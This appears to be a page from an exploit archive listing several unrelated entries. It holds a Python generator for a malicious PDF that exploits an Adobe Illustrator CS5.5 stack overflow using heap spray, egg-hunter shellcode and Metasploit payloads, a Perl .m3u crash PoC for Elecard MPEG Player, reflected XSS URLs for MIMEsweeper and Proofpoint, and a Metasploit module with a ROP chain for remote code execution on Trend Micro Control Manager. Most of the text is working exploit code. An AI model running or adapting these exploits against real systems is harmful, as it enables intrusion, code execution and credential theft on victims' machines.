0x30,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3A,0x3B,0x3C,0x3D,0x3E,0x3F,
0x40,0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4A,0x4B,0x4C,0x4D,0x4E,0x4F,
0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5A,0x5B,0x5C,0x5D,0x5E,0x5F,
0x60,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6A,0x6B,0x6C,0x6D,0x6E,0x6F,
0x70,0x71,0x72,0x73,0x74,0x75,0x76,0x77,0x78,0x79,0x7A,0x7B,0x7C,0x7D,0x7E,0x00,
0x80,0x00,0x82,0x83,0x84,0x85,0x86,0x87,0x88,0x89,0x8A,0x8B,0x8C,0x00,0x00,0x00,
0x00,0x91,0x92,0x93,0x94,0x95,0x96,0x97,0x98,0x99,0x9A,0x9B,0x9C,0x00,0x00,0x9F,
0x20,0xA1,0xA2,0xA3,0xA4,0xA5,0xA6,0xA7,0xA8,0xA9,0xAA,0xAB,0xAC,0x2D,0xAE,0xAF,
0xB0,0xB1,0xB2,0xB3,0xB4,0xB5,0xB6,0xB7,0xB8,0xB9,0xBA,0xBB,0xBC,0xBD,0xBE,0xBF,
0xC0,0xC1,0xC2,0xC3,0xC4,0xC5,0xC6,0xC7,0xC8,0xC9,0xCA,0xCB,0xCC,0xCD,0xCE,0xCF,
0xD0,0xD1,0xD2,0xD3,0xD4,0xD5,0xD6,0xD7,0xD8,0xD9,0xDA,0xDB,0xDC,0xDD,0xDE,0xDF,
0xE0,0xE1,0xE2,0xE3,0xE4,0xE5,0xE6,0xE7,0xE8,0xE9,0xEA,0xEB,0xEC,0xED,0xEE,0xEF,
0xF0,0xF1,0xF2,0xF3,0xF4,0xF5,0xF6,0xF7,0xF8,0xF9,0xFA,0xFB,0xFC,0xFD,0xFE,0xFF]
invalid = [ i for i in xrange(0,0xff+1) if cmap[i] != i and i>0x1f]
def getXImage(width, height, fill='\x90', tail='\xcc'):
'''
[ a b c d tx ty ] llx lly urx ury h w bits ImageType AlphaChannelCount reserved bin-ascii ImageMask XI
Arguments to the XI operator specify the location and size of the image, its
pixel bit depth, color type, and other attributes
The image matrix maps the unit square of user space, bounded by
(0, 0) and (1, 1) in user space, to the boundary of the source image in
image space.
'''
doc = '''0 A
u
0 O
0 g
0 J 0 j 1 w 10 M []0 d
0 XR
%AI5_File:
%AI5_BeginRaster
[$width$ 0 0 $height$ 0 0] 0 0 $width$ $height$ $width$ $height$ 8 1 0 0 $bin_ascii$ 0
%%BeginData: $size$
XI
$data$
%%EndData
XH
%AI5_EndRaster
F
U
'''
bin_ascii = 1 #binary
doc = doc.replace('$width$','%d'%width)
doc = doc.replace('$height$','%d'%height)
doc = doc.replace('$bin_ascii$','%d'%bin_ascii)
doc = doc.replace('$size$','%d'%(width*height))
data = (fill*(width*height))
data = data[:width*height-len(tail)]+tail
if bin_ascii == 0:
data = data.encode('hex')
data_formated = ''
for i in xrange(0,len(data)+62,62):
data_formated += '%'+data[i:i+62]+'\n'
data = data_formated
doc = doc.replace('$data$',data)
return doc
def makeASCIICode(msfpayload):
msfpayload = Popen('msfpayload3.5 %s R'%msfpayload, shell=True, stdout=PIPE)
msfencode = Popen("msfencode3.5 BufferRegister=EAX -e x86/alpha_mixed -b '%s' -t raw"%''.join(['\\x%02x'%x for x in invalid]),
shell=True,
stdin=msfpayload.stdout,
stdout=PIPE)
code = msfencode.communicate()[0]
return code
def mkAIPrivate(options):
baseai = '''
%!PS-Adobe-3.0
%%Creator: Adobe Illustrator(TM) 3.2
%%AI8_CreatorVersion: 15.0.2
%AI5_FileFormat 11.0
%%For: (Administrator) ()
%%Title: (thafile.ai)
%%CreationDate: 1/21/2011 12:32 PM
%%Canvassize: 16383
%%BoundingBox: 29 -389 198 75
%%DocumentProcessColors: Black
%%DocumentFonts: MyriadPro-Regular
%%DocumentNeededFonts: MyriadPro-Regular
%%DocumentNeededResources: procset Adobe_packedarray 2.0 0
%%+ procset Adobe_cshow 1.1 0
%%+ procset Adobe_customcolor 1.0 0
%%+ procset Adobe_typography_AI3 1.0 1
%%+ procset Adobe_pattern_AI3 1.0 0
%%+ procset Adobe_Illustrator_AI3 1.0 1
%AI3_ColorUsage: Color
%AI3_TemplateBox: 298 -421 298 -421
%AI3_TileBox: -8.35986 -816.9453 603.6406 -24.9448
%AI3_DocumentPreview: None
%%PageOrigin:-8 -817
%AI7_GridSettings: 72 8 72 8 1 0 0.8 0.8 0.8 0.9 0.9 0.9
%AI9_Flatten: 1
%AI12_CMSettings: 00.MS
%%EndComments
%%BeginProlog
%%IncludeResource: procset Adobe_packedarray 2.0 0
Adobe_packedarray /initialize get exec
%%IncludeResource: procset Adobe_cshow 1.1 0
%%IncludeResource: procset Adobe_customcolor 1.0 0
%%IncludeResource: procset Adobe_typography_AI3 1.0 1
%%IncludeResource: procset Adobe_pattern_AI3 1.0 0
%%IncludeResource: procset Adobe_Illustrator_AI3 1.0 1
%%EndProlog
%%BeginSetup
%%IncludeFont: MyriadPro-Regular
Adobe_cshow /initialize get exec
Adobe_customcolor /initialize get exec
Adobe_typography_AI3 /initialize get exec
Adobe_pattern_AI3 /initialize get exec
Adobe_Illustrator_AI3 /initialize get exec
[
39/quotesingle 96/grave 128/Euro 130/quotesinglbase/florin/quotedblbase/ellipsis
/dagger/daggerdbl/circumflex/perthousand/Scaron/guilsinglleft/OE 145/quoteleft
/quoteright/quotedblleft/quotedblright/bullet/endash/emdash/tilde/trademark
/scaron/guilsinglright/oe/dotlessi 159/Ydieresis /space 164/currency 166/brokenbar
168/dieresis/copyright/ordfeminine 172/logicalnot/hyphen/registered/macron/ring
/plusminus/twosuperior/threesuperior/acute/mu 183/periodcentered/cedilla
/onesuperior/ordmasculine 188/onequarter/onehalf/threequarters 192/Agrave
/Aacute/Acircumflex/Atilde/Adieresis/Aring/AE/Ccedilla/Egrave/Eacute
/Ecircumflex/Edieresis/Igrave/Iacute/Icircumflex/Idieresis/Eth/Ntilde
/Ograve/Oacute/Ocircumflex/Otilde/Odieresis/multiply/Oslash/Ugrave
/Uacute/Ucircumflex/Udieresis/Yacute/Thorn/germandbls/agrave/aacute
/acircumflex/atilde/adieresis/aring/ae/ccedilla/egrave/eacute/ecircumflex
/edieresis/igrave/iacute/icircumflex/idieresis/eth/ntilde/ograve/oacute
/ocircumflex/otilde/odieresis/divide/oslash/ugrave/uacute/ucircumflex
/udieresis/yacute/thorn/ydieresis
TE
%AI3_BeginEncoding: _MyriadPro-Regular MyriadPro-Regular
[/_MyriadPro-Regular/MyriadPro-Regular 0 0 1 TZ
%AI3_EndEncoding AdobeType
%%EndSetup
$HEAPSPRAY$
u
0 To
1 0 0 1 63.9058 -54.9058 0 Tp
TP
1 0 0 1 63.9058 -54.9058 Tm
0 Tr
0 O
0 0 0 1 k
4 M
/_MyriadPro-Regular 12 Tf
100 Tz
0 Tt
0 0 Tl
0 Tc
($PATTERN$) Tx 1 0 Tk
TO
U
%%PageTrailer
gsave annotatepage grestore showpage
%%Trailer
Adobe_Illustrator_AI3 /terminate get exec
Adobe_pattern_AI3 /terminate get exec
Adobe_typography_AI3 /terminate get exec
Adobe_customcolor /terminate get exec
Adobe_cshow /terminate get exec
Adobe_packedarray /terminate get exec
%%EOF
'''
#configure token and search code snipet
token = 0x494c4546
if options.w7:
#Win7 In w7 the environment memory is 0x10000bytes long!
msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=process'
baseai = baseai.replace('$HEAPSPRAY$','')
jmp_addr = 0x00001FF01
write_addr = 0x0001FF01
elif options.xp:
#XPSP3
msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=process'
baseai = baseai.replace('$HEAPSPRAY$','')
jmp_addr = 0x10F00
write_addr = 0x10F00
elif options.osx:
code = Popen('msfpayload3.5 osx/x86/exec CMD=/Applications/Calculator.app/Contents/MacOS/Calculator EXITFUNC=process R', shell=True, stdout=PIPE).communicate()[0]
baseai = baseai.replace('$HEAPSPRAY$',getXImage(1020,1024,fill='\x90',tail='\xcc'+code+'\xcc')*300 )
payload = "A"*284
payload += struct.pack("<L", 0x31000100)
#Write the string in octal form
ai_data = baseai.replace('$PATTERN$', ''.join(['\\%o'%ord(i) for i in payload]))
return ai_data
elif options.multi:
msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=seh'
jmp_addr = 0x18e41111
write_addr = 0xFFFF #Segfault
#configure token and search code snipet
search = '\x80\x79\xff\x01' #CMP BYTE [ECX-1],1
search += '\x74\x18' #JZ fixstack
search += '\xc6\x41\xff\x01' #MOV BYTE [ECX-1],1
search += '\x58' #search: pop EAX
search += '\x3D'+struct.pack('<L',token) #cmp EAX, $token
search += '\x75\xF8' #jnz %search
search += '\x89\xe0' #mov eax,esp
search += '\x81\xec'+struct.pack("<L",0x1000) #sub esp, 0x1000
search += '\x89\xe5' #mov ebp,esp
search += '\xFF\xD0' #CALL EAX
##Second crash fix stack
# Search for stack signature (Tested in 15.0.0 15.0.1 15.0.2)
# 00000045
# 00000001
# 00000000
# 00000045
search += '\x81\xc4'+struct.pack("<L",0x1000) #add esp, 0x1000
search += '\x58' #POP EAX
search += '\x40' #INC EAX
search += '\x83\xF8\x46' #CMP EAX,46
search += '\x75\xF9' #JNE SHORT loop
###
search += '\x58' #POP EAX
search += '\x40' #INC EAX
search += '\x83\xF8\x02' #CMP EAX,02
search += '\x75\xF9' #JNE SHORT loop
###
search += '\x58' #POP EAX
search += '\x40' #INC EAX
search += '\x83\xF8\x01' #CMP EAX,01
search += '\x75\xF9' #JNE SHORT loop
###
search += '\x58' #POP EAX
search += '\x40' #INC EAX
search += '\x83\xF8\x46' #CMP EAX,46
search += '\x75\xF9' #JNE SHORT loop
#Fix frame and return
search += '\x83\xEC\x1C' #SUB ESP,1C
search += '\x5d' #POP EBP
search += '\xc3' #RET
baseai = baseai.replace('$HEAPSPRAY$',getXImage(1020,1024,fill='\x90',tail=search)*300 )
else:
#DEBUG
def pattern(size):
def _pattern():
for i in xrange(ord('a'),ord('z')+1):
for j in xrange(ord('0'),ord('9')+1):
for k in xrange(ord('A'),ord('Z')+1):
for h in xrange(ord('0'),ord('9')+1):
yield chr(i)
yield chr(j)
yield chr(k)
yield chr(h)
return ''.join(list(_pattern())[:size])
p = pattern(3000)
ai_data = baseai.replace('($PATTERN$)', '('+p+')').replace('$HEAPSPRAY$',getXImage(1020,1024)*20)
return ai_data
#prepare shellcode..
if options.payload:
msfpayload = args[1]
code = makeASCIICode(msfpayload)
search = '\x58' #search: pop EAX
search += '\x3D'+struct.pack('<L',token) #cmp EAX, $token
search += '\x75\xF8' #jnz %search
search += '\x89\xe0' #mov eax,esp
search += '\x89\xe5' #mov ebp,esp
search += '\xFF\xD0' #CALL EAX
payload = search
payload += 'A'*(268 - len(payload))
payload += struct.pack('<L',jmp_addr) #offset 268
payload += 'B'*(352 - len(payload))
payload += struct.pack('<L', write_addr) #offset 352 (originally a heap address)
payload += 'C'*(376 - len(payload))
payload += struct.pack('<L',token) #offset 376
payload += code #offset 380
assert len(payload)<=0x3000, 'Payload too long!, it may hit the end of the stack'
#Double check it doesn't have invalid chars...
for c in search:
assert not ord(c) in invalid, 'c:%s is in %s'%('%02x'%ord(c),['\\x%02x'%x for x in invalid])
#Write the string in octal form
ai_data = baseai.replace('$PATTERN$', ''.join(['\\%o'%ord(i) for i in payload]))
#ai_data holds the ai private data to we inserted in the pdf shell
return ai_data
def mkPDFShell(ai_data):
#The document
doc = PDFDoc()
#font
font = PDFDict()
font.add('Name', PDFName('F1'))
font.add('Subtype', PDFName('Type1'))
font.add('BaseFont', PDFName('Helvetica'))
#name:font map
fontname = PDFDict()
fontname.add('F1',font)
#resources
resources = PDFDict()
resources.add('Font',fontname)
#contents
contents= PDFStream({},'BT /F1 24 Tf 240 700 Td (Pedefe Pedefeito Pedefeon!) Tj ET')
doc.add(contents)
#begin illustrator bit
private = PDFDict()
illustrator = PDFDict()
#slice the private data in 64k packs
data = ai_data
compress = {}
chunk_size = 0xffff*20
for i in xrange(0,len(data)/chunk_size+1):
priv_data = PDFStream({'Filter': '/FlateDecode'},data[chunk_size*i:chunk_size*(i+1)].encode('zlib'))
hsh = hashlib.md5(priv_data.stream)
if not hsh.hexdigest() in compress.keys():
doc.add(priv_data)
ref = PDFRef(priv_data)
compress[hsh.hexdigest()] = ref
private.add('AIPrivateData%d'%(i+1),ref)
private.add('NumBlock',PDFNum(len(data)/0xffff+1))
private.add('ContainerVersion',PDFNum(15.0))
private.add('CreatorVersion',PDFNum(15.0))
private.add('RoundtripVersion',PDFNum(15.0))
illustrator.add('LastModified',PDFString('D:20110202124811-07\'00\''))
illustrator.add('Private',PDFRef(private))
doc.add(private)
doc.add(illustrator)
#page
page = PDFDict()
page.add('Type',PDFName('Page'))
page.add('Resources',resources)
page.add('Contents', PDFRef(contents))
page.add('PieceInfo',PDFDict({'Illustrator': PDFRef(illustrator)}))
doc.add(page)
#pages
pages = PDFDict()
pages.add('Type', PDFName('Pages'))
pages.add('Kids', PDFArray([PDFRef(page)]))
pages.add('Count', PDFNum(1))
#add parent reference in page
page.add('Parent',PDFRef(pages))
doc.add(pages)
#catalog
catalog = PDFDict()
catalog.add('Type', PDFName('Catalog'))
catalog.add('Pages', PDFRef(pages))
doc.add(catalog)
doc.setRoot(catalog)
return str(doc)
if __name__ == '__main__':
parser = optparse.OptionParser(description='Adobe Illustrator File Format Tx operator Stack Overflow')
parser.add_option('--debug', action='store_true', default=False, help='For debugging')
parser.add_option('--multi', action='store_true', default=False, help='Heapspraying for multitarget')
parser.add_option('--w7', action='store_true', default=False, help='For Windows7')
parser.add_option('--xp', action='store_true', default=False, help='For Windows XP (generic)')
parser.add_option('--osx', action='store_true', default=False, help='For OSX (tested on plain leopard)')
parser.add_option('--payload', action='store_true', default=False, help="Metasploit payload. Ex. 'windows/exec CMD=calc.exe'")
parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation')
(options, args) = parser.parse_args()
if not options.w7 + options.xp + options.debug + options.multi + options.osx + options.doc== 1:
print 'Try --help'
exit(-1)
elif options.doc:
print __doc__
exit(0)
ai_data = mkAIPrivate(options)
print mkPDFShell(ai_data)
#f/
Adobe Illustrator CS5.5 memory corruption proof of concept exploit that spawns a calculator.
aBo MoHaMeD/Elecard MPEG Player 5.5 Buffer Overflow ( na)
#!/usr/bin/perl -w ######################################################################## #Program : Elecard MPEG Player #Version : 5.5 build 15884.081218 #website : http://www.elecard.com/download/index.php #Download : http://www.elecard.com/ftp/pub/mpeg/player/EMpgPlayer.zip #Type : * (.M3U) Buffer Overflow POC ######################################################################## #EAX 00000000 #ECX 41414141 #EDX 7C9037D8 ntdll.7C9037D8 #EBX 00000000 #ESP 0012BE40 #EBP 0012BE60 #ESI 00000000 #EDI 00000000 #EIP 41414141 #C 0 ES 0023 32bit 0(FFFFFFFF) #P 1 CS 001B 32bit 0(FFFFFFFF) #A 0 SS 0023 32bit 0(FFFFFFFF) #Z 1 DS 0023 32bit 0(FFFFFFFF) #S 0 FS 003B 32bit 7FFDF000(FFF) #T 0 GS 0000 NULL #D 0 #O 0 #EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE) #MM0 0020 0202 0000 001B #MM1 015A F2BC 8986 2BC0 #MM2 011C 0000 4020 027F #MM3 0000 0000 804D A735 #MM4 BADB 0D00 BF83 15E6 #MM5 8A1B EAB8 0000 0005 #MM6 0000 0000 0000 0000 #MM7 D1B7 1758 E219 6000 my $file="boom.m3u"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE "http://"."A" x 72850; close($FILE); print "$file has been created \n";
Elecard MPEG Player version 5.5 .m3u file stack buffer overflow denial of service proof of concept exploit.
Anastasios Monachos/MIMEsweeper For SMTP 5.5 Cross Site Scripting ( na)
Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM)
Vendor: Clearswift Ltd
Vendor URL: http://www.clearswift.com/
Category: Reflective XSS
Google dork: inurl:/MSWPMM/
Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]
[Vulnerability Reproduction]
1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script>
2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script>
3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script>
4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script>
5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script>
6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script>
9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script>
[Time-line]
17/07/2009 - Initial discovery
13/01/2012 - Notified vendor
13/01/2012 - Vendor responded
16/01/2012 - Vendor requested more information
16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate
16/01/2012 - Informed vendor for evaluation progress, v5.5.0 is vulnerable too
17/01/2012 - Telephone conversation with vendor in regards the findings
17/01/2012 - Assigned vulnerability reference MSW-1459
25/01/2012 - Requested status update
25/01/2012 - Vendor replied "There is no update on MSW-1459."
16/02/2012 - Requested status update
26/02/2012 - Vendor replied "There is no update on MSW-1459."
23/03/2012 - Requested status update
23/03/2012 - Vendor replied "There is no update on MSW-1459."
09/05/2012 - Requested status update and gave a notice for public disclosure
11/05/2012 - Vendor replied "There is no update on MSW-1459."
18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team
07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release
07/06/2012 - Requested due to date for next release
12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012
13/06/2012 - We suggested to postpone the disclosure after the patch be public
06/12/2012 - Requested status update
06/12/2012 - Vendor sent details for patch
28/01/2013 - Patch is applicable for 5.5.1
09/02/2012 - We requested for demo license to verify fix
15/02/2013 - Vendor could not produce demo license for us to verify the fix
15/02/2013 - Vendor closes incident ticket
18/02/2013 - Public disclosure date
MIMEsweeper for SMTP version 5.5 Personal Message Manager suffers from multiple cross site scripting vulnerabilities.
Karan Khosla/Proofpoint Protection Server 5.5.5 Cross Site Scripting ( na)
Sense of Security - Security Advisory - SOS-11-005
Release Date. 03-May-2011
Last Update. -
Vendor Notification Date. 28-Apr-2011
Product. Proofpoint Protection Server
Platform. Appliance
Affected versions. 5.5.5 (verified), and possibly others
Severity Rating. Medium
Impact. Cookie/credential theft,
impersonation, loss of confidentiality
Attack Vector. Remote without authentication
Solution Status. Vendor patch
CVE reference. Not yet assigned
Details.
The Proofpoint Protection Server offers anti-spam and anti-virus,
connection management, email firewall and policy enforcement features.
A Cross-Site Scripting (XSS) vulnerability has been discovered in the
Proofpoint Protection Server where input is passed to the query string
of process.cgi. This has occurred as a result of the application not
properly filtering HTML tags which allows malicious JavaScript to be
embedded. When input is incorrectly validated and not properly sanitised
and then displayed in a web page, attackers can trick users into viewing
the web page and causing malicious code to be executed.
Proof of Concept.
The Cross-Site Scripting vulnerability can be triggered by using the
following URL:
https://proofpoint.yyy.com.au:10020/enduser/process.cgi?cmd=release&
recipient=xxx@yyy.com.au&
msg_id=%28MDYzMjU0NTJkYTQ0OWRhYjJlNWY1MjBhNzc5MDEwODlkZGY5OGIzMTc1MGI=%29&
locale=enus&x=580&y=470&displayprogress=t%22%20
onmouseover=%22alert%281%29%22%20name=%22frame_display%22%20id=%22
frame_display%22%20NORESIZE%20SCROLLING=%22no%22%20/%3E%3C!--
Where: proofpoint.yyy.com.au:10020 is the internal FQDN of the Proofpoint
appliance (this is the link received in the 'quarantine mail alert' email)
Note: the recipient and msg_id parameters do not need to be valid (exist on
Proofpoint) to trigger the vulnerability.
Solution.
The vendor has advised that 'Patch 1084' is now available,
and should be applied to fix this issue.
Discovered by.
Karan Khosla - Sense of Security Labs.
About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier application penetration testing firm and
trusted IT security advisor to many of the country's largest
organisations.
Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA
T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU
The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-005.pdf
Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php
Proofpoint Protection Server version 5.5.5 suffers from a cross site scripting vulnerability.
blue/TrendMicro Control Manager 5.5 Buffer Overflow ( na)
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
def initialize(info={})
super(update_info(info,
'Name' => "TrendMicro Control Manger <= v5.5 CmdProcessor.exe Stack Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability in the CmdProcessor.exe component of Trend
Micro Control Manger up to version 5.5.
The specific flaw exists within CmdProcessor.exe service running on TCP port
20101. The vulnerable function is the CGenericScheduler::AddTask function of
cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet,
controlled data is copied into a 256-byte stack buffer. This can be exploited
to execute remote code under the context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', #Initial discovery
'Blue', #Metasploit
],
'References' =>
[
['CVE', '2011-5001'],
['OSVDB', '77585'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-345/']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => 'process',
},
'Platform' => 'win',
'Targets' =>
[
[
# TCM 5.5 cannot be installed in Win2k3 SP0-SP1, Win2k8, or XP
'Windows 2003 Server SP2 (DEP Bypass)',
{
'Ret' => 0x666b34c8, # TMNotify.dll stack pivot
'Offset' => 5000
}
],
],
'Privileged' => false,
'DisclosureDate' => "Dec 07 2011",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(20101)
], self.class)
end
def junk
return rand_text(4).unpack("L")[0].to_i
end
def exploit
#TmUpdate.dll
rop_chain = [
0x668074d4, # POP EDX # OR AL,0F6 # RETN
0x3FCD0FFC, # Put 00001000 into edx
0x667611b2, # ADD EDX,C0330004 # RETN 04
0x667c99e7, # POP EBP # RETN [TmUpdate.dll]
junk,
0x667c99e7, # skip 4 bytes [TmUpdate.dll]
0x667e3250, # POP EBX # RETN [TmUpdate.dll]
0xffffffff, # NEG EBX
0x6683ab64, # INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]
0x6683ab64, # INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]
0x6680a1d3, # POP EAX # RETN [TmUpdate.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x66812b53, # NEG EAX # RETN [TmUpdate.dll]
0x667f030a, # MOV ECX,EAX # RETN [TmUpdate.dll]
0x667d4c7c, # POP EDI # RETN [TmUpdate.dll]
0x667e8003, # RETN (ROP NOP) [TmUpdate.dll]
0x667d54d0, # POP ESI # RETN [TmUpdate.dll]
0x667baf06, # JMP [EAX] [TmUpdate.dll]
0x66833376, # POP EAX # RETN [TmUpdate.dll]
0x6686115c, # ptr to &VirtualAlloc() [IAT TmUpdate.dll]
0x6681ceb3, # PUSHAD # RETN [TmUpdate.dll]
0x668382c3, # ptr to 'call esp' [TmUpdate.dll]
].pack('V*')
#rop chain generated by mona.py
header = "\x00\x00"
header << "\x13\x88" #size of buffer
header << rand_text_alpha(9)
header << "\x15\x09\x13" #opcode
header << "\x00\x00\x00"
header << rand_text_alpha(25)
header << "\xFE\xFF\xFF\xFF" #in instruction #MOV EDI,DWORD PTR DS:[EAX+ECX] #ECX is our buffer and needs to be readable dword
header << "\xFF\xFF\xFF\xFF" #after sum with EAX. Pointer from EAX increments by #LEA EAX,DWORD PTR DS:[EAX+EDI+4] and then is saved
header << "\xFF\xFF\xF4\xFF" #and used again. We can essentially walk the loop which increments EBX by 1 until we get to 14 which leads
header << "\xFF\xFF" #us to our vulnerable function
header << rand_text_alpha(1) #align stack again for rop
pay = rop_chain
pay << make_nops(374 - rop_chain.length)
pay << "\xeb\x04" #Short jmp 0x04
pay << [target.ret].pack('V')
pay << payload.encoded
sploit = header
sploit << pay
filler = rand_text_alpha(target['Offset'] - (sploit.length))
connect
print_status("Sending request...")
sock.put(sploit + filler)
handler
disconnect
end
end
This Metasploit module exploits a vulnerability in the CmdProcessor.exe component of Trend Micro Control Manager up to version 5.5. The specific flaw exists within CmdProcessor.exe service running on TCP port 20101. The vulnerable function is the CGenericScheduler::AddTask function of cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet, controlled data is copied into a 256-byte stack buffer. This can be exploited to execute remote code under the context of the user.